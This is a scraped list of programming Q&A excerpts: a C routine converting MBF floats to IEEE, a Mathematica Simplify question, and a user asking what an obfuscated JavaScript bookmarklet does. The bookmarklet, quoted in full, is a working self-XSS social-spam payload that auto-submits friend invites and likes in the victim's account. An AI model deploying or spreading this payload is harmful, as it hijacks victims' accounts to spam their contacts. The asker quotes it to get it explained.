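        uint32_t mantissa = mbfBits & 0x007FFFFFu;        /* low 23 bits         */

        if (mbfExp == 0)
            return 0.0f;

        /* MBF: 0.1m * 2^(e - 128)  ==  IEEE: 1.m * 2^(e - 129),
           so the IEEE biased exponent is (e - 129) + 127 = e - 2. */
        uint32_t ieeeBits = (sign << 31) | ((mbfExp - 2u) << 23) | mantissa;

        float result;
        memcpy(&result, &ieeeBits, sizeof result);
        return result;
    }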

    Read the article

  • Targeted Simplify in Mathematica

    - by Timo
    I generate very long and complex analytic expressions of the general form: (...something not so complex...)(...ditto...)(...ditto...)...lots... When I try to use Simplify, Mathematica grinds to a halt, I am assuming due to the fact that it tries to expand the brackets and or simplify across different brackets. The brackets, while containing long expressions, are easily simplified by Mathematica on their own. Is there some way I can limit the scope of Simplify to a single bracket at a time? Edit: Some additional info and progress. So using the advice from you guys I have now started using something in the vein of In[1]:= trouble = Log[(x + I y) (x - I y) + Sqrt[(a + I b) (a - I b)]]; In[2]:= Replace[trouble, form_ /; (Head[form] == Times) :> Simplify[form],{3}] Out[2]= Log[Sqrt[a^2 + b^2] + (x - I y) (x + I y)] Changing Times to an appropriate head like Plus or Power makes it possible to target the simplification quite accurately. The problem / question that remains, though, is the following: Simplify will still descend deeper than the level specified to Replace, e.g. In[3]:= Replace[trouble, form_ /; (Head[form] == Plus) :> Simplify[form], {1}] Out[3]= Log[Sqrt[a^2 + b^2] + x^2 + y^2] simplifies the square root as well. My plan was to iteratively use Replace from the bottom up one level at a time, but this clearly will result in vast amount of repeated work by Simplify and ultimately result in the exact same bogging down of Mathematica I experienced in the outset. Is there a way to restrict Simplify to a certain level(s)? I realize that this sort of restriction may not produce optimal results, but the idea here is getting something that is "good enough".

    Read the article

  • What does this code do

    - by Wardy
    Ok someone who happens to be a good friend of mine is sending me some odd emails lately one of which was a link to a page that asks you to copy and paste this in to your address bar in your browser then execute it ... javascript:(function(){a='app125879300771588_jop';b='app125879300771588_jode';ifc='app125879300771588_ifc';ifo='app125879300771588_ifo';mw='app125879300771588_mwrapper';var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];d[_0xc100[2]](a)[_0xc100[4]]=d[_0xc100[2]](b)[_0xc100[5]];d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();setTimeout(function (){fs[_0xc100[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xc100[11]](_0xc100[9],_0xc100[10]);} ,5000);setTimeout(function (){d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();d[_0xc100[2]](ifo)[_0xc100[4]]=d[_0xc100[2]](ifc)[_0xc100[5]];} ,5000);})(); Not being totally with it when it comes to low level programming i'm curious as to what the email is asking here ... PLEASE DO NOT RUN THIS CODE UNLESS YOU ARE HAPPY THAT IT WILL NOT BREAK ANYTHING. But ... Could someone tell me what it does?

    Read the article
